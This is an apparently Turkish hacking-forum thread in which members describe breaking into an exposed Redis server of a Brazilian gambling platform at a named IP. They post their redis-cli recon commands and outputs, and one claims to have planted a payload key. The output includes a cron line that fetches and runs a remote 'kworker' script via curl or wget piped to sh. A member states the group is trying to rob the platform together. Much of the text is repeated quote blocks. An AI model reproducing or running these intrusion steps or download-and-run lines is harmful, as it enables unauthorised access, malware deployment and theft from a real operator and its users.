Method Brezilya AWS Üzerindeki Kumar Platformu - Redis'ten Canlı API Manipülasyonuna
- Konuyu başlatan ssdemirfb1
- Başlangıç tarihi
Rating - 0%
Son zamanlarda gördüğüm en kaliteli konu,
Eline yüreğine sağlık konuda bahsettiğin herşeyi kendimde bizzat denedim seni tebrik ederim.
@spyhackerz en iyisi sende bi göz at bu konuya
- Katılım
- 20 Şub 2022
- Tepki puanı
- 1
Rating - 0%
teşekkürler
- Katılım
- 8 Ara 2024
- Tepki puanı
- 3
Rating - 0%
Rating - 0%
Bakalım
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
rankın veteran a çekildi deneyimlerini forum arkadaşların ile paylaşman çok güzel 
bende bir inceleyeyim dedim keygen oluşturdum sonra bir payload oluşturup dosyayı kaydedip sunucu hafızasına gönderdim artık ram belleğinde crackit isiminde bir değişken bekliyor boşa çıkarsam devamını getirir miyim emin değilim ama uzun zamandır böyle şeyler paylaşılmıyordu bu iyi oldu
dediğin gibi
└──╼ $redis-cli -h 54.94.58.48 KEYS "*"
1) "backup1"
2) "alert:merchantIdsSet"
3) "backup3"
4) "alert:lock:game"
5) "gmp:match:bot_data:1797709388989"
6) "backup4"
7) "alert:gamesSet"
8) "wallet:command:lock:UploadExpireWalletHistory"
9) "crackit"
10) "backup2"
bu arada sunucuyu başkaları yol geçen hanına çevirmiş
şuraya bak
redis-cli -h 54.94.58.48 GET backup1
──╼ $redis-cli -h 54.94.58.48 GET backup1
"\n\n\n*/2 * * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh\n\n"
başka bir siber saldırgan grubu tarafından ele geçirilmiş çoktan bir Botnet/Madenci (Miner) ağına dahil edilmiş
*/2 * * * *: Bu şu demek: "Her 2 dakikada bir bu komutu çalıştır."
root: Komut en yüksek yetkiyle (root) çalışıyor.
curl -fsSL http://34.70.205.211/.../kworker | sh: Sunucu her 2 dakikada bir gidip belirtilen IP adresinden kworker isimli bir script indiriyor ve onu sh ile çalıştırıyor.
redis-cli -h 54.94.58.48 GET backup2
diğeri de aynı
"\n\n\n*/3 * * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh\n\n"
o halde sistemde kimler var ona bakalım
redis-cli -h 54.94.58.48 CLIENT LIST
redis-cli -h 54.94.58.48 CLIENT LIST
id=57418149 addr=100.64.25.231:49808 laddr=100.64.59.220:6379 fd=3762 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418150 addr=100.64.25.231:49998 laddr=100.64.59.220:6379 fd=3763 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418151 addr=100.64.25.231:49890 laddr=100.64.59.220:6379 fd=3764 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418152 addr=100.64.25.231:50018 laddr=100.64.59.220:6379 fd=3765 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0
... diye devam ediyor
bende bir inceleyeyim dedim keygen oluşturdum sonra bir payload oluşturup dosyayı kaydedip sunucu hafızasına gönderdim artık ram belleğinde crackit isiminde bir değişken bekliyor boşa çıkarsam devamını getirir miyim emin değilim ama uzun zamandır böyle şeyler paylaşılmıyordu bu iyi oldu
dediğin gibi
└──╼ $redis-cli -h 54.94.58.48 KEYS "*"
1) "backup1"
2) "alert:merchantIdsSet"
3) "backup3"
4) "alert:lock:game"
5) "gmp:match:bot_data:1797709388989"
6) "backup4"
7) "alert:gamesSet"
8) "wallet:command:lock:UploadExpireWalletHistory"
9) "crackit"
10) "backup2"
bu arada sunucuyu başkaları yol geçen hanına çevirmiş
şuraya bak
redis-cli -h 54.94.58.48 GET backup1
──╼ $redis-cli -h 54.94.58.48 GET backup1
"\n\n\n*/2 * * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh\n\n"
başka bir siber saldırgan grubu tarafından ele geçirilmiş çoktan bir Botnet/Madenci (Miner) ağına dahil edilmiş
*/2 * * * *: Bu şu demek: "Her 2 dakikada bir bu komutu çalıştır."
root: Komut en yüksek yetkiyle (root) çalışıyor.
curl -fsSL http://34.70.205.211/.../kworker | sh: Sunucu her 2 dakikada bir gidip belirtilen IP adresinden kworker isimli bir script indiriyor ve onu sh ile çalıştırıyor.
redis-cli -h 54.94.58.48 GET backup2
diğeri de aynı
"\n\n\n*/3 * * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh\n\n"
o halde sistemde kimler var ona bakalım
redis-cli -h 54.94.58.48 CLIENT LIST
redis-cli -h 54.94.58.48 CLIENT LIST
id=57418149 addr=100.64.25.231:49808 laddr=100.64.59.220:6379 fd=3762 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418150 addr=100.64.25.231:49998 laddr=100.64.59.220:6379 fd=3763 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418151 addr=100.64.25.231:49890 laddr=100.64.59.220:6379 fd=3764 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418152 addr=100.64.25.231:50018 laddr=100.64.59.220:6379 fd=3765 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0
... diye devam ediyor
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
└──╼ $redis-cli -h 54.94.58.48 SMEMBERS alert:merchantIdsSetrankın veteran a çekildi deneyimlerini forum arkadaşların ile paylaşman çok güzel
bende bir inceleyeyim dedim keygen oluşturdum sonra bir payload oluşturup dosyayı kaydedip sunucu hafızasına gönderdim artık ram belleğinde crackit isiminde bir değişken bekliyor boşa çıkarsam devamını getirir miyim emin değilim ama uzun zamandır böyle şeyler paylaşılmıyordu bu iyi oldu
dediğin gibi
└──╼ $redis-cli -h 54.94.58.48 KEYS "*"
1) "backup1"
2) "alert:merchantIdsSet"
3) "backup3"
4) "alert:lock:game"
5) "gmp:match:bot_data:1797709388989"
6) "backup4"
7) "alert:gamesSet"
8) "wallet:command:lock:UploadExpireWalletHistory"
9) "crackit"
10) "backup2"
bu arada sunucuyu başkaları yol geçen hanına çevirmiş
şuraya bak
redis-cli -h 54.94.58.48 GET backup1
──╼ $redis-cli -h 54.94.58.48 GET backup1
"\n\n\n*/2 * * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh\n\n"
başka bir siber saldırgan grubu tarafından ele geçirilmiş çoktan bir Botnet/Madenci (Miner) ağına dahil edilmiş
*/2 * * * *: Bu şu demek: "Her 2 dakikada bir bu komutu çalıştır."
root: Komut en yüksek yetkiyle (root) çalışıyor.
curl -fsSL http://34.70.205.211/.../kworker | sh: Sunucu her 2 dakikada bir gidip belirtilen IP adresinden kworker isimli bir script indiriyor ve onu sh ile çalıştırıyor.
redis-cli -h 54.94.58.48 GET backup2
diğeri de aynı
"\n\n\n*/3 * * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh\n\n"
o halde sistemde kimler var ona bakalım
redis-cli -h 54.94.58.48 CLIENT LIST
redis-cli -h 54.94.58.48 CLIENT LIST
id=57418149 addr=100.64.25.231:49808 laddr=100.64.59.220:6379 fd=3762 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418150 addr=100.64.25.231:49998 laddr=100.64.59.220:6379 fd=3763 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418151 addr=100.64.25.231:49890 laddr=100.64.59.220:6379 fd=3764 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=4 argv-mem=0 obl=0 oll=0 omem=0 tot-mem=20488 events=r cmd=NULL user=default redir=-1
id=57418152 addr=100.64.25.231:50018 laddr=100.64.59.220:6379 fd=3765 name= age=62379 idle=62379 flags=N db=0 sub=0 psub=0
... diye devam ediyor
1) "1705374337"
2) "1714041819"
3) "1717040534"
4) "1718612562"
5) "1737979303"
6) "1749463880"
7) "1752205941"
8) "1756280008"
9) "1756783833"
10) "1757738189"
11) "1759923719"
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 KEYS "*1705374337*"
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 -n 1 KEYS "*"
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 SMEMBERS alert:gamesSet
1) "classic_limbo"
2) "super_double"
3) "color_realistic"
4) "scratch_match"
devam
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 KEYS "*config*"
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MONITOR
OK
1770833940.852318 [0 100.64.24.103:49616] "hello" "3"
1770833940.852342 [0 100.64.24.103:50426] "hello" "3"
1770833940.855640 [0 100.64.24.103:49616] "set" "alert:lock:game" "1770833940" "ex" "50" "nx"
1770833940.855979 [0 100.64.24.103:50426] "sadd" "alert:gamesSet" "classic_fiery_bot"
1770833940.856449 [0 100.64.24.103:49616] "smembers" "alert:merchantIdsSet"
1770833940.856579 [0 100.64.24.103:50426] "sadd" "alert:merchantIdsSet" "1756280008" "1717040534" "1749463880" "1737979303" "1752205941" "1756783833" "1714041819" "1759923719" "1705374337" "1718612562" "1757738189"
1770833940.856828 [0 100.64.24.103:49616] "get" "alert:rule:game"
1770834000.021595 [0 100.64.109.55:39930] "hello" "3"
1770834000.026252 [0 100.64.109.55:39930] "set" "jp:mgr:lock" "1" "ex" "240" "nx"
1770834000.028833 [0 100.64.109.55:39930] "del" "jp:mgr:lock"
1770834000.031165 [0 100.64.109.55:39930] "hgetall" "jp:ga"
1770834000.851978 [0 100.64.24.103:34286] "hello" "3"
1770834000.853447 [0 100.64.24.103:34286] "sadd" "alert:merchantIdsSet" "1749463880" "1756783833" "1717040534" "1752205941" "1757738189" "1705374337" "1759923719" "1718612562" "1756280008" "1737979303" "1714041819"
1770834000.863215 [0 100.64.24.103:34566] "hello" "3"
1770834000.864111 [0 100.64.24.103:34566] "set" "alert:lock:game" "1770834000" "ex" "50" "nx"
1770834000.864508 [0 100.64.24.103:34566] "smembers" "alert:merchantIdsSet"
1770834000.866635 [0 100.64.24.103:34566] "get" "alert:rule:game"
1770834027.733997 [0 100.64.109.53:47912] "hello" "3"
1770834027.738229 [0 100.64.109.53:47912] "get" "gmp:match:bot_data:1797709388989"
1770834028.701826 [0 100.64.25.234:38582] "hello" "3"
1770834028.702800 [0 100.64.25.234:38582] "hget" "gmp:room:info:1797709384793" "1996995602290769920"
1770834060.848179 [0 100.64.24.103:52070] "hello" "3"
1770834060.850083 [0 100.64.24.103:52072] "hello" "3"
1770834060.851557 [0 100.64.24.103:52072] "sadd" "alert:gamesSet" "footballx"
1770834060.851956 [0 100.64.24.103:52072] "sadd" "alert:merchantIdsSet" "1705374337" "1737979303" "1752205941" "1756783833" "1759923719" "1717040534" "1718612562" "1749463880" "1757738189" "1756280008" "1714041819"
1770834060.853997 [0 100.64.24.103:52070] "set" "alert:lock:game" "1770834060" "ex" "50" "nx"
1770834060.854693 [0 100.64.24.103:52070] "smembers" "alert:merchantIdsSet"
1770834060.855298 [0 100.64.24.103:52070] "get" "alert:rule:game"
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 HGETALL jp:ga
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 HGETALL gmp:room:info:1797709384793
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 GET alert:rule:game
(nil)
işler ilginçleşiyor sanırım anlık siliniyor oda oyunu bitince
Son düzenleme:
Rating - 0%
Ben dün bi kaç deneme yaptım değişik valla..
Sitelere kayıt olmayada çalıştım dünyanın en d*lyarak tasarımına sahipler
Rating - 0%
Neyse eski spy ruhu geri dönüyo
Topluca vurgun yapmaya çalışıyoruz
Topluca vurgun yapmaya çalışıyoruz
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 --stat
------- data ------ --------------------- load -------------------- - child -
keys mem clients blocked requests connections
9 95.72M 4737 0 3324482 (+0) 57742019
9 95.72M 4737 0 3324483 (+1) 57742020
9 95.72M 4737 0 3324484 (+1) 57742020
9 95.72M 4737 0 3324485 (+1) 57742022
9 95.72M 4737 0 3324486 (+1) 57742022
9 95.72M 4737 0 3324487 (+1) 57742024
9 95.72M 4737 0 3324488 (+1) 57742024
9 95.72M 4737 0 3324489 (+1) 57742025
9 95.72M 4737 0 3324490 (+1) 57742026
9 95.72M 4737 0 3324491 (+1) 57742026
9 95.72M 4737 0 3324492 (+1) 57742028
9 95.72M 4737 0 3324493 (+1) 57742028
9 95.72M 4737 0 3324494 (+1) 57742030
9 95.72M 4737 0 3324495 (+1) 57742030
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 KEYS "*session*"
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $^C
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE backup1
(integer) 168
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE alert:merchantIdsSet
(integer) 116
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE gmp:match:bot_data:1797709388989
(integer) 176
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE backup3
(integer) 152
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 --bigkeys
# Scanning the entire keyspace to find biggest keys as well as
# average sizes per key type. You can use -i 0.1 to sleep 0.1 sec
# per 100 SCAN commands (not usually needed).
100.00% ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Keys sampled: 8
-------- summary -------
Total key length in bytes is 139 (avg len 17.38)
peki o zaman --stat komutunda gördüğümüz 95.72 MB nereye gitti?
"Fragmentation" (Parçalanma) veya "Deleted Data Persistence". Redis veriyi RAM'den silse bile, işletim sisteminden aldığı o bellek alanını (95MB) hemen geri vermez; "belki yine veri gelir" diye rezerve tutar.
Yani içerisi aslında boşaltılmış bir depo gibi, ama kapladığı alan hala büyük görünüyor.
Orijinal senaryodaki o meşhur gmp:merchant:config ve diğer büyük veri yığınları gerçekten silinmiş. Muhtemelen o gördüğümüz "kworker" virüsünü atan grup, içeri girer girmez FLUSHALL komutuyla her şeyi temizledi, ardından kendi küçük virüs satırlarını (backup1 vs.) ekledi. O 95MB, silinen o eski devasa veritabanından kalan "bellek izi".
└──╼ $redis-cli -h 54.94.58.48 --stat
------- data ------ --------------------- load -------------------- - child -
keys mem clients blocked requests connections
9 95.72M 4737 0 3324482 (+0) 57742019
9 95.72M 4737 0 3324483 (+1) 57742020
9 95.72M 4737 0 3324484 (+1) 57742020
9 95.72M 4737 0 3324485 (+1) 57742022
9 95.72M 4737 0 3324486 (+1) 57742022
9 95.72M 4737 0 3324487 (+1) 57742024
9 95.72M 4737 0 3324488 (+1) 57742024
9 95.72M 4737 0 3324489 (+1) 57742025
9 95.72M 4737 0 3324490 (+1) 57742026
9 95.72M 4737 0 3324491 (+1) 57742026
9 95.72M 4737 0 3324492 (+1) 57742028
9 95.72M 4737 0 3324493 (+1) 57742028
9 95.72M 4737 0 3324494 (+1) 57742030
9 95.72M 4737 0 3324495 (+1) 57742030
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 KEYS "*session*"
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $^C
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE backup1
(integer) 168
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE alert:merchantIdsSet
(integer) 116
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE gmp:match:bot_data:1797709388989
(integer) 176
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE backup3
(integer) 152
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 --bigkeys
# Scanning the entire keyspace to find biggest keys as well as
# average sizes per key type. You can use -i 0.1 to sleep 0.1 sec
# per 100 SCAN commands (not usually needed).
100.00% ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Keys sampled: 8
-------- summary -------
Total key length in bytes is 139 (avg len 17.38)
peki o zaman --stat komutunda gördüğümüz 95.72 MB nereye gitti?
"Fragmentation" (Parçalanma) veya "Deleted Data Persistence". Redis veriyi RAM'den silse bile, işletim sisteminden aldığı o bellek alanını (95MB) hemen geri vermez; "belki yine veri gelir" diye rezerve tutar.
Yani içerisi aslında boşaltılmış bir depo gibi, ama kapladığı alan hala büyük görünüyor.
Orijinal senaryodaki o meşhur gmp:merchant:config ve diğer büyük veri yığınları gerçekten silinmiş. Muhtemelen o gördüğümüz "kworker" virüsünü atan grup, içeri girer girmez FLUSHALL komutuyla her şeyi temizledi, ardından kendi küçük virüs satırlarını (backup1 vs.) ekledi. O 95MB, silinen o eski devasa veritabanından kalan "bellek izi".
- Katılım
- 2 Ara 2015
- Tepki puanı
- 7,823
Rating - 0%
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 --stat
------- data ------ --------------------- load -------------------- - child -
keys mem clients blocked requests connections
9 95.72M 4737 0 3324482 (+0) 57742019
9 95.72M 4737 0 3324483 (+1) 57742020
9 95.72M 4737 0 3324484 (+1) 57742020
9 95.72M 4737 0 3324485 (+1) 57742022
9 95.72M 4737 0 3324486 (+1) 57742022
9 95.72M 4737 0 3324487 (+1) 57742024
9 95.72M 4737 0 3324488 (+1) 57742024
9 95.72M 4737 0 3324489 (+1) 57742025
9 95.72M 4737 0 3324490 (+1) 57742026
9 95.72M 4737 0 3324491 (+1) 57742026
9 95.72M 4737 0 3324492 (+1) 57742028
9 95.72M 4737 0 3324493 (+1) 57742028
9 95.72M 4737 0 3324494 (+1) 57742030
9 95.72M 4737 0 3324495 (+1) 57742030
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 KEYS "*session*"
(empty array)
┌─[ghost@ghost]─[~]
└──╼ $^C
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE backup1
(integer) 168
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE alert:merchantIdsSet
(integer) 116
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE gmp:match:bot_data:1797709388989
(integer) 176
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MEMORY USAGE backup3
(integer) 152
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 --bigkeys
# Scanning the entire keyspace to find biggest keys as well as
# average sizes per key type. You can use -i 0.1 to sleep 0.1 sec
# per 100 SCAN commands (not usually needed).
100.00% ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Keys sampled: 8
-------- summary -------
Total key length in bytes is 139 (avg len 17.38)
peki o zaman --stat komutunda gördüğümüz 95.72 MB nereye gitti?
"Fragmentation" (Parçalanma) veya "Deleted Data Persistence". Redis veriyi RAM'den silse bile, işletim sisteminden aldığı o bellek alanını (95MB) hemen geri vermez; "belki yine veri gelir" diye rezerve tutar.
Yani içerisi aslında boşaltılmış bir depo gibi, ama kapladığı alan hala büyük görünüyor.
Orijinal senaryodaki o meşhur gmp:merchant:config ve diğer büyük veri yığınları gerçekten silinmiş. Muhtemelen o gördüğümüz "kworker" virüsünü atan grup, içeri girer girmez FLUSHALL komutuyla her şeyi temizledi, ardından kendi küçük virüs satırlarını (backup1 vs.) ekledi. O 95MB, silinen o eski devasa veritabanından kalan "bellek izi".
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 SCAN 0 MATCH "*merchant*"
1) "0"
2) 1) "alert:merchantIdsSet"
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MONITOR | grep -iE "merchant|secret|config|key"
1770835020.851946 [0 100.64.24.103:35832] "smembers" "alert:merchantIdsSet"
1770835020.851973 [0 100.64.24.103:35810] "sadd" "alert:merchantIdsSet" "1717040534" "1705374337" "1749463880" "1756280008" "1718612562" "1756783833" "1714041819" "1752205941" "1737979303" "1757738189" "1759923719"
yine monitor açtım bir halta çıkmayacak gibi zaten zombiye mi dönmüş monero için yoksa oyunlar mı bitiyor boş zamanda iyice üstüne düşmek lazım kurcaladıkça yeni bir şey çıkıyor şimdi de yeni oyun çıktı
$redis-cli -h 54.94.58.48 MONITOR
OK
1770835140.859971 [0 100.64.24.103:39210] "hello" "3"
1770835140.859987 [0 100.64.24.103:39238] "hello" "3"
1770835140.860950 [0 100.64.24.103:39210] "set" "alert:lock:game" "1770835140" "ex" "50" "nx"
1770835140.862178 [0 100.64.24.103:39238] "sadd" "alert:merchantIdsSet" "1717040534" "1756280008" "1757738189" "1714041819" "1749463880" "1718612562" "1737979303" "1752205941" "1759923719" "1705374337" "1756783833"
1770835140.862461 [0 100.64.24.103:39210] "smembers" "alert:merchantIdsSet"
1770835140.862834 [0 100.64.24.103:39210] "get" "alert:rule:game"
1770835163.421398 [0 172.16.0.121:40973] "COMMAND" "DOCS"
1770835163.686810 [0 172.16.0.121:40973] "INFO" "SERVER"
1770835163.953671 [0 172.16.0.121:40973] "COMMAND"
1770835176.949701 [0 172.16.0.121:40973] "SCAN" "0" "COUNT" "10"
1770835200.059756 [0 100.64.109.55:33698] "hello" "3"
1770835200.069585 [0 100.64.109.55:33698] "set" "jp:mgr:lock" "1" "ex" "240" "nx"
1770835200.072354 [0 100.64.109.55:33698] "del" "jp:mgr:lock"
1770835200.077127 [0 100.64.109.55:33698] "hgetall" "jp:ga"
1770835200.853933 [0 100.64.24.103:56148] "hello" "3"
1770835200.854997 [0 100.64.24.103:56148] "set" "alert:lock:game" "1770835200" "ex" "50" "nx"
1770835200.855345 [0 100.64.24.103:56148] "smembers" "alert:merchantIdsSet"
1770835200.855922 [0 100.64.24.103:56148] "get" "alert:rule:game"
1770835200.861670 [0 100.64.24.103:56512] "hello" "3"
1770835200.862877 [0 100.64.24.103:56512] "sadd" "alert:gamesSet" "red_hot7s"
1770835200.863495 [0 100.64.24.103:56666] "hello" "3"
1770835200.864309 [0 100.64.24.103:56666] "sadd" "alert:merchantIdsSet" "1756280008" "1705374337" "1718612562" "1737979303" "1752205941" "1714041819" "1759923719" "1749463880" "1756783833" "1757738189" "1717040534"
1770835227.757505 [0 100.64.109.53:54432] "hello" "3"
1770835227.761308 [0 100.64.109.53:54432] "get" "gmp:match:bot_data:1797709388989"
1770835228.694277 [0 100.64.25.234:54140] "hello" "3"
1770835228.696023 [0 100.64.25.234:54140] "hget" "gmp:room:info:1797709384793" "1996995602290769920"
1770835254.733331 [0 100.64.76.38:47912] "hello" "3"
1770835254.737209 [0 100.64.76.38:47912] "set" "sink:limit:merchant_records:c19da9b5f6f8feecfd0c8c048d001bda" "1" "ex" "5" "nx"
1770835255.740383 [0 100.64.76.38:47912] "set" "sink:limit:merchant_records:48dd9be913c672bdaaa41b103bd1b1bb" "1" "ex" "5" "nx"
1770835260.851086 [0 100.64.24.103:56324] "hello" "3"
1770835260.851515 [0 100.64.24.103:56286] "hello" "3"
1770835260.851920 [0 100.64.24.103:56324] "sadd" "alert:merchantIdsSet" "1752205941" "1714041819" "1737979303" "1718612562" "1756783833" "1759923719" "1705374337" "1757738189" "1756280008" "1749463880" "1717040534"
1770835260.852403 [0 100.64.24.103:56286] "set" "alert:lock:game" "1770835260" "ex" "50" "nx"
1770835260.853562 [0 100.64.24.103:55910] "hello" "3"
1770835260.854709 [0 100.64.24.103:55910] "smembers" "alert:merchantIdsSet"
1770835260.855352 [0 100.64.24.103:55910] "get" "alert:rule:game"
1770835320.847176 [0 100.64.24.103:39640] "hello" "3"
1770835320.847298 [0 100.64.24.103:39700] "hello" "3"
1770835320.848576 [0 100.64.24.103:39700] "sadd" "alert:merchantIdsSet" "1705374337" "1749463880" "1756783833" "1717040534" "1737979303" "1756280008" "1752205941" "1714041819" "1757738189" "1759923719" "1718612562"
1770835320.848661 [0 100.64.24.103:39640] "set" "alert:lock:game" "1770835320" "ex" "50" "nx"
1770835320.849065 [0 100.64.24.103:39640] "smembers" "alert:merchantIdsSet"
1770835320.849886 [0 100.64.24.103:39640] "get" "alert:rule:game"
1770835347.726652 [0 100.64.109.53:40058] "hello" "3"
1770835347.731118 [0 100.64.109.53:40058] "get" "gmp:match:bot_data:1797709388989"
Rating - 0%
54.94.58.48:6379> HGETALL gmp:merchant:config:hash┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 SCAN 0 MATCH "*merchant*"
1) "0"
2) 1) "alert:merchantIdsSet"
┌─[ghost@ghost]─[~]
└──╼ $redis-cli -h 54.94.58.48 MONITOR | grep -iE "merchant|secret|config|key"
1770835020.851946 [0 100.64.24.103:35832] "smembers" "alert:merchantIdsSet"
1770835020.851973 [0 100.64.24.103:35810] "sadd" "alert:merchantIdsSet" "1717040534" "1705374337" "1749463880" "1756280008" "1718612562" "1756783833" "1714041819" "1752205941" "1737979303" "1757738189" "1759923719"
yine monitor açtım bir halta çıkmayacak gibi zaten zombiye mi dönmüş monero için yoksa oyunlar mı bitiyor boş zamanda iyice üstüne düşmek lazım kurcaladıkça yeni bir şey çıkıyor şimdi de yeni oyun çıktı
$redis-cli -h 54.94.58.48 MONITOR
OK
1770835140.859971 [0 100.64.24.103:39210] "hello" "3"
1770835140.859987 [0 100.64.24.103:39238] "hello" "3"
1770835140.860950 [0 100.64.24.103:39210] "set" "alert:lock:game" "1770835140" "ex" "50" "nx"
1770835140.862178 [0 100.64.24.103:39238] "sadd" "alert:merchantIdsSet" "1717040534" "1756280008" "1757738189" "1714041819" "1749463880" "1718612562" "1737979303" "1752205941" "1759923719" "1705374337" "1756783833"
1770835140.862461 [0 100.64.24.103:39210] "smembers" "alert:merchantIdsSet"
1770835140.862834 [0 100.64.24.103:39210] "get" "alert:rule:game"
1770835163.421398 [0 172.16.0.121:40973] "COMMAND" "DOCS"
1770835163.686810 [0 172.16.0.121:40973] "INFO" "SERVER"
1770835163.953671 [0 172.16.0.121:40973] "COMMAND"
1770835176.949701 [0 172.16.0.121:40973] "SCAN" "0" "COUNT" "10"
1770835200.059756 [0 100.64.109.55:33698] "hello" "3"
1770835200.069585 [0 100.64.109.55:33698] "set" "jp:mgr:lock" "1" "ex" "240" "nx"
1770835200.072354 [0 100.64.109.55:33698] "del" "jp:mgr:lock"
1770835200.077127 [0 100.64.109.55:33698] "hgetall" "jp:ga"
1770835200.853933 [0 100.64.24.103:56148] "hello" "3"
1770835200.854997 [0 100.64.24.103:56148] "set" "alert:lock:game" "1770835200" "ex" "50" "nx"
1770835200.855345 [0 100.64.24.103:56148] "smembers" "alert:merchantIdsSet"
1770835200.855922 [0 100.64.24.103:56148] "get" "alert:rule:game"
1770835200.861670 [0 100.64.24.103:56512] "hello" "3"
1770835200.862877 [0 100.64.24.103:56512] "sadd" "alert:gamesSet" "red_hot7s"
1770835200.863495 [0 100.64.24.103:56666] "hello" "3"
1770835200.864309 [0 100.64.24.103:56666] "sadd" "alert:merchantIdsSet" "1756280008" "1705374337" "1718612562" "1737979303" "1752205941" "1714041819" "1759923719" "1749463880" "1756783833" "1757738189" "1717040534"
1770835227.757505 [0 100.64.109.53:54432] "hello" "3"
1770835227.761308 [0 100.64.109.53:54432] "get" "gmp:match:bot_data:1797709388989"
1770835228.694277 [0 100.64.25.234:54140] "hello" "3"
1770835228.696023 [0 100.64.25.234:54140] "hget" "gmp:room:info:1797709384793" "1996995602290769920"
1770835254.733331 [0 100.64.76.38:47912] "hello" "3"
1770835254.737209 [0 100.64.76.38:47912] "set" "sink:limit:merchant_records:c19da9b5f6f8feecfd0c8c048d001bda" "1" "ex" "5" "nx"
1770835255.740383 [0 100.64.76.38:47912] "set" "sink:limit:merchant_records:48dd9be913c672bdaaa41b103bd1b1bb" "1" "ex" "5" "nx"
1770835260.851086 [0 100.64.24.103:56324] "hello" "3"
1770835260.851515 [0 100.64.24.103:56286] "hello" "3"
1770835260.851920 [0 100.64.24.103:56324] "sadd" "alert:merchantIdsSet" "1752205941" "1714041819" "1737979303" "1718612562" "1756783833" "1759923719" "1705374337" "1757738189" "1756280008" "1749463880" "1717040534"
